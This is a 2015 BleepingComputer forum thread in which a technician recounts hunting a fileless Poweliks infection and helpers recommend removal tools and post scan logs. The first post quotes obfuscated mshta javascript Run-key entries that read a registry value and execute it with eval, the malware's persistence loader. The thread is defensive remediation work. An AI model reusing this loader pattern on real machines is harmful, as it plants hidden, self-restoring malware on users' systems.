Jump to content


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.

Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.


How I stopped the nameless one

  • Please log in to reply
7 replies to this topic

#1 catchineddies


  • Members
  • 8 posts
  • Local time:11:09 AM

Posted 12 June 2015 - 11:44 AM


I am not a specialist in malware removal but have done my fair share.  Therefore, my methods are my own and I do not recommend anyone following the procedures I outline below unless they are very comfortable with what they are doing.




I searched and searched for someone experiencing a similar problem but found only one hit without fruit.  The rest resulted in mshta.exe infections from long ago, this was not that.  I run a small MSP businesses and use both Webroot and Malwarebytes Pro on all systems.  Two computers from different locations recently reported infected files (some .TMP, some .DLL)  They were always classified by Webroot as General Malware or Dropper.  They came back each day even after being removed successfully.  The computer would appear fine otherwise.  But a few things on close inspection...


Running CMD netstat -aon showed a dozens of HTTP/S connections to outside IPs.  The PIDs would show Explorer and SVCHOST processes doing the activity.  Using prefetch_info.exe to look in the Windows\Prefetch directory at DLLHOST and CONHOST I could tell something was amiss because it was called by files in the user profile temp directories.  But everything that accessed it from a temp locations had already disappeared.  Short lived worker files?


I ran CleanUp, ccleaner, TDSKiller, FRST, HiJackThis, GMER, Malwarebytes and Webroot full scans.  Everything came up clean with two exceptions. 


FRST and HiJackThis showed the following cryptic results in the registry (example from HJT)

O4 - HKLM\..\Run: [] mshta javascript:A7PaxDw3I="Hg";zN1=new%20ActiveXObject("WScript.Shell");yKooQAt97="NxS3";Nmtb8=zN1.RegRead("HKLM\\software\\Wow6432Node\\e6e3af07\\90869640");rgKgX95wG="fFRtUZi";eval(Nmtb8);z9Z6dGQm="R1ZyA";
O4 - HKCU\..\Run: [] mshta javascript:RKaMnJIw7="s6LoM2y8St";W92C=new%20ActiveXObject("WScript.Shell");Wt1gbqYXH="Ykn7GLvZI";Ep5N9e=W92C.RegRead("HKCU\\software\\e6e3af07\\90869640");xKSe33Bcb="TO234";eval(Ep5N9e);u65WRSeqD="X45EQXl";
O4 - HKLM\..\Policies\Explorer\Run: [] mshta javascript:fSrOm7wU="sf71";V7d=new%20ActiveXObject("WScript.Shell");uvc4Tlw="Sdu23cbO";TZ1aP=V7d.RegRead("HKLM\\software\\Wow6432Node\\e6e3af07\\90869640");UKRxcbx97W="oak";eval(TZ1aP);UQp3LpOAh="A";

RegEdit gave me an error trying to access any of the Run Keys shown above because they contain invalid characters.  When looking at the keys, they looked normal.  Through LogMeIn I could search the registry and see the "default" key had the values presented, but I could not rename or delete them.  Also, looking further in the string you can see the keys e6e3af07 which I could find.  If I deleted them they came back immediately.  This is where it got fun!  Roll up your sleeves and get ready for battle!


I brought up SysInternals ProcessMonitor (procmon) and filtered by Operation 'RegCreateKey'.  Deleted the e6e3af07 key in the registry and looked for the process that brought it back.  Start SysInternals ProcessExplorer and find the process in question and SUSPEND it.  We aren't out of the wood yet!  These guys work in packs!  Double-click on the suspended process and look to see what spawned it (Parent).  In some cases the process no longer exists, it will tell you there.  If it still exists, go and suspend that one and repeat until the trail ends (I had svchost, explorer, and msiexec on one machine).  All these processes also had a reference to counters.dat in the user's profile which you could see in ProcessExplorer (view>show lower pane), so you could do a spot check if you wish.  Then repeat deleting the e6e3af07 registry key.  If it reappears find it in Procmon and suspend it in ProcessExplorer.  Once it stays gone we have it stapled to the wall.  Keep ProcessExplorer running.  We rest, for only a moment, in the eddie.


Now to keep it from returning...


I struggled for a while trying to figure out why HJT couldn't delete the keys and I couldn't see them.  In fact HJT had more results in HKLM\..\Run than I could see.  This is where I learned about virtualization in the registry.  A cloaking device! (for backward compatibility I think..).  Opening a CMD prompt I typed..

reg flags HKLM\Software\Microsoft\Windows\CurrentVersion\Run set DONT_VIRTUALIZE /s

and if it is a 64-bit machine..

reg flags HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run set DONT_VIRTUALIZE /s


I still got the error when clicking on the Run key but I could see everything that was legitimate.  How I chose to approach this was to Export the Run Key, delete it, then Import the key.  Because the cryptic key used invalid characters and was not visible, it wasn't exported. The imported key was clean.  I repeated this process for all the Run locations (including Explorer !).  Reran HJT to make sure all of them were gone.  Lastly, I returned to Process Explorer and KILLED the suspended processes.  Ran CleanUp and CCleaner to make sure temp folders were empty.


Now the big question is.. what did I encounter?!  It seems to me that the registry keys created the infected file using the information in the value.  How it is that an invalid character in a registry value can cause so many problems, not be detected by AV, but still function properly?  Has anyone else ran into this and know if I am missing anything?


Thanks for listening,



Since this is my first post I am not familiar with how to add pictures or I would have.  I just wanted to get the story out there.

BC AdBot (Login to Remove)


#2 Sintharius


    Bleepin' Sniper

  • Members
  • 5,639 posts
  • Gender:Female
  • Location:The Netherlands
  • Local time:05:09 PM

Posted 12 June 2015 - 11:50 AM

Hello there,

HijackThis is outdated and not suitable for malware removal any longer, so we have stopped using it and moved on to other tools.

Registry virtualization is only a technique introduced by Microsoft to reduce registry bloating, and thus eliminate the need for registry cleaners. Those are not recommended here in BC.

In your case it looks like you have a Poweliks infection. Please run this.

Step 1
Please download Powelikscleaner (by ESET) and save it to your Desktop.
  • Double-click ESETPoweliksCleaner.exe to start the tool.
  • Read the terms of the End-user license agreement and click Agree if you agree to them.
  • The tool will run automatically. If the cleaner finds a Poweliks infection, press the Y key on your keyboard to remove it.
  • If Poweliks was detected "Win32/Poweliks was successfully removed from your system" will be displayed. Press any key to exit the tool and reboot your PC.
  • The tool will produce a log in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.

#3 catchineddies

  • Topic Starter

  • Members
  • 8 posts
  • Local time:11:09 AM

Posted 12 June 2015 - 12:12 PM

Wow, you nailed it.  I ran it on one system which came up positive, the other negative (but I had more thoroughly cleaned it).  So I searched what you called it as and it didn't seem to match, then I saw this article..




Looks like what I ran into for sure.


Thanks for your help!

#4 Sintharius


    Bleepin' Sniper

  • Members
  • 5,639 posts
  • Gender:Female
  • Location:The Netherlands
  • Local time:05:09 PM

Posted 12 June 2015 - 12:47 PM

Hello there,

Poweliks is by nature a Trojan Downloader - which means it is used to infiltrate a machine and downloads other malware once it has gotten a foothold on the system.

We will run additional scans to make sure that there aren't any of Poweliks' "friends" still lurking around.

Emsisoft Emergency Kit

Please download Emsisoft Emergency Kit and save it to your desktop. Double click on the EmsisoftEmergencyKit file you downloaded to extract its contents and create a shortcut on the desktop. Leave all settings as they are and click the Extract button at the bottom. A folder named EEK will be created in the root of the drive (usually c:\).
  • After extraction please double-click on the new Start Emsisoft Emergency Kit icon on your desktop.
  • The first time you launch it, Emsisoft Emergency Kit will recommend that you allow it to download updates. Please click Yes so that it downloads the latest database updates.
  • When the update process is complete, a new button will appear in the lower-left corner that says Back. Click on this button to return to the Overview screen.
  • Click on Scan to be taken to the scan options. If you are asked if you want the scanner to scan for Potentially Unwanted Programs, then click Yes.
  • Click on the Full Scan button to start the scan.
  • When the scan is completed click the Quarantine selected objects button. Note, this option is only available if malicious objects were detected during the scan.
  • When the threats have been quarantined, click the View report button in the lower-right corner, and the scan log will be opened in Notepad.
  • Please save the log in Notepad on your desktop, and attach it to your next reply.
  • When you close Emsisoft Emergency Kit, it will give you an option to sign up for a newsletter. This is optional, and is not necessary for the malware removal process.

Malwarebytes Anti-Malware

Download Malwarebytes Anti-Malware from here.

Double click on the file mbam-setup-2.x.x.xxxx.exe to install the application. (x.x.xxxx is the version)
  • Follow the prompt. At the end place a checkmark in Launch Malwarebytes Anti-Malware, then choose Finish.
  • When MBAM opens it will says Your database is out of date. Choose Fix Now.
  • Click on the Scan tab at the top of the window, choose Threat Scan, then Scan Now.
  • If you receive a message that updates are available, choose Update Now button (the scan will start after updates are completed).
  • Please be patient as the scan will take some time.
  • If MBAM detected threats, choose Quarantine for all items, then click Apply Actions.
  • While still on the Scan tab, choose View detailed log. In the window that opens, click the Export button, choose Text file (*.txt) and save the log to your Desktop.
If MBAM encounters a file that is difficult to remove, you will be presented with 1 of 2 prompts.
Click OK to either and let MBAM proceed with the disinfection process.
If asked to restart the computer, please do so immediately.


#5 catchineddies

  • Topic Starter

  • Members
  • 8 posts
  • Local time:11:09 AM

Posted 12 June 2015 - 03:09 PM

MBAMv1 is already installed on the system but won't detect it, probably because it lacks the MBAR components.  Will MBAMv2 conflict?  I can't uninstall MBAMv1 as it is a part of the service kit provided, not a standalone product.


As for Emsisoft..


Emsisoft Emergency Kit - Version 9.0
Last update: 6/12/2015 2:22:11 PM
User account:

Scan settings:

Scan type: Full Scan
Objects: Rootkits, Memory, Traces, C:\, D:\, Q:\

Detect PUPs: On
Scan archives: On
ADS Scan: On
File extension filter: Off
Advanced caching: On
Direct disk access: Off

Scan start: 6/12/2015 2:22:33 PM
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{34AD1EA7-8B9E-4D8B-B3ED-365D12C8EE73}  detected: Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{3BA6794F-1E38-4460-949A-0DE97D8EF5C2}  detected: Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{5684EAE9-72EB-4CA6-83B8-82434B7E955C}  detected: Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{6605E3BD-7BC3-479C-BF0A-E5D5E954EA52}  detected: Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{66D59105-FE06-43A4-B292-EB0097E9EB74}  detected: Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{9103C314-C4E2-4463-8934-B19BCB46236D}  detected: Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{93F0AC70-20D8-4AE8-A02F-6812EFFB6B58}  detected: Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{94E98D20-156E-4C53-BD7F-972C96E680B2}  detected: Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\TYPELIB\{192F487E-E812-40C0-B0DE-CB4BFA20F37B}  detected: Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\TYPELIB\{79332472-47F3-4E32-B07F-CF8DF4C58499}  detected: Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\TYPELIB\{BC153A3C-0BB7-4EED-83AE-28E6E398F56E}  detected: Application.AdTool (A)
Key: HKEY_USERS\S-1-5-21-2822584677-3767598069-2626080132-1001\SOFTWARE\APPDATALOW\SOFTWARE\VIDEODOWNLOADCONVERTER_4Z  detected: Application.AdTool (A)
Key: HKEY_USERS\S-1-5-21-343818398-813497703-1801674531-500\SOFTWARE\APPDATALOW\SOFTWARE\VIDEODOWNLOADCONVERTER_4Z  detected: Application.AdTool (A)
C:\Users\station5.BSC-DOM\AppData\Local\iac  detected: Application.AppInstall (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{68B8DCDB-EFA4-420A-BB8A-71B9892A2063}  detected: Adware.Win32.Drospa (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{A5F6C90C-ABE4-4C57-A421-8C5A202AA9F8}  detected: Adware.Win32.Drospa (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{B13281CF-8778-4C98-AE23-ABBA4637A33D}  detected: Adware.Win32.Drospa (A)

Scanned 179598
Found 27

Scan end: 6/12/2015 3:00:09 PM
Scan time: 0:37:36

Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{B13281CF-8778-4C98-AE23-ABBA4637A33D} Quarantined Adware.Win32.Drospa (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{A5F6C90C-ABE4-4C57-A421-8C5A202AA9F8} Quarantined Adware.Win32.Drospa (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{68B8DCDB-EFA4-420A-BB8A-71B9892A2063} Quarantined Adware.Win32.Drospa (A)
C:\Users\station5.BSC-DOM\AppData\Local\iac Quarantined Application.AppInstall (A)
Key: HKEY_USERS\S-1-5-21-343818398-813497703-1801674531-500\SOFTWARE\APPDATALOW\SOFTWARE\VIDEODOWNLOADCONVERTER_4Z Quarantined Application.AdTool (A)
Key: HKEY_USERS\S-1-5-21-2822584677-3767598069-2626080132-1001\SOFTWARE\APPDATALOW\SOFTWARE\VIDEODOWNLOADCONVERTER_4Z Quarantined Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\TYPELIB\{BC153A3C-0BB7-4EED-83AE-28E6E398F56E} Quarantined Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\TYPELIB\{79332472-47F3-4E32-B07F-CF8DF4C58499} Quarantined Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\TYPELIB\{192F487E-E812-40C0-B0DE-CB4BFA20F37B} Quarantined Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{94E98D20-156E-4C53-BD7F-972C96E680B2} Quarantined Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{93F0AC70-20D8-4AE8-A02F-6812EFFB6B58} Quarantined Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{9103C314-C4E2-4463-8934-B19BCB46236D} Quarantined Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{66D59105-FE06-43A4-B292-EB0097E9EB74} Quarantined Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{6605E3BD-7BC3-479C-BF0A-E5D5E954EA52} Quarantined Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{5684EAE9-72EB-4CA6-83B8-82434B7E955C} Quarantined Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{3BA6794F-1E38-4460-949A-0DE97D8EF5C2} Quarantined Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{34AD1EA7-8B9E-4D8B-B3ED-365D12C8EE73} Quarantined Application.AdTool (A)

Quarantined 27

#6 Sintharius


    Bleepin' Sniper

  • Members
  • 5,639 posts
  • Gender:Female
  • Location:The Netherlands
  • Local time:05:09 PM

Posted 12 June 2015 - 04:25 PM

Hi there,

If there is already MBAM on the system then skip the second one.

ESET Online Scanner
  • Click here to download the installer for ESET Online Scanner and save it to your Desktop.
  • Disable all your antivirus and antimalware software - see how to do that here.
  • Right click on esetsmartinstaller_enu.exe and select Run as Administrator.
  • Place a checkmark in YES, I accept the Terms of Use, then click Start. Wait for ESET Online Scanner to load its components.
  • Select Enable detection of potentially unwanted applications.
  • Click Advanced Settings, then place a checkmark in the following:
    • Remove found threats
    • Scan archives
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • Click Start to begin scanning.
  • ESET Online Scanner will start downloading signatures and scan. Please be patient, as this scan can take quite some time.
  • When the scan is done, click List threats (only available if ESET Online Scanner found something).
  • Click Export, then save the file to your desktop.
  • Click Back, then Finish to exit ESET Online Scanner.

#7 thismeanswar


  • Members
  • 1 posts
  • Local time:08:09 AM

Posted 06 November 2015 - 12:52 AM

Hi there. I found this by searching for "mshta javascript wscript.shell virus" which is the only non randomized string in the only evidence of virus infection i could find.


I too was on my 3rd virus scanner when i decided their must be a smarter way. Ran the Powelikscleaner executable and it did find the virus in question. Rebooting and running again verified that this tool actually did work! where my previous hunting for keys that were there, but at the same time were not there, seemed to be going in circles and i was doubting that there was an infection still.


I then ran the second tool, after uninstalling aviria, sophos, malwarebytes, which all failed to detect it. Sophos is pretty bad because it was installed far before the infection and is updated over the corporate network hourly.


sophos found the inital infection earlier in the week, into programdata i think, caused by a DOC file the user thinks, but could not stop it cold as this purpose built eradicator tool did.


hijack this, malware bytes, and aviria, have been able to stop almost anything i have seen before this. Hijackthis did find the only initial symptom of the virus, i am just disapointed in the other tools.


emisoft found 0 results after. So maybe sophos did block all the things it tried to download. oh well, too bad so sad! now to convince the users to run limited user accounts! an even more difficult battle!




thanks a bunch. keep on fighting the good fight! it would be impossible to keep up without people like you guys!




#8 Sintharius


    Bleepin' Sniper

  • Members
  • 5,639 posts
  • Gender:Female
  • Location:The Netherlands
  • Local time:05:09 PM

Posted 06 November 2015 - 02:13 AM

Glad to know we could help. :)

On a side note, HijackThis is outdated and not suitable for malware removal any longer as it cannot show files properly on x64 systems.

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users